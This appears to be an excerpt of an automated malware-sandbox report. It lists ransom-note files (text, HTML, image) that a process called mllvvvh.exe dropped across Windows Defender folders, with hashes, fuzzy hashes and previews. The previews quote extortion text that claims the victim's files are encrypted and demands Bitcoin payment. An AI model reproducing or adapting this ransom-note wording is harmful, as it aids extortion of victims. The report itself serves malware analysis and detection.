                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\Clean Store\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Backup\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Backup\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Backup\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Default\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Default\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Default\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\NisBackup\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\NisBackup\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\NisBackup\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Updates\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Updates\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Updates\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Features\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
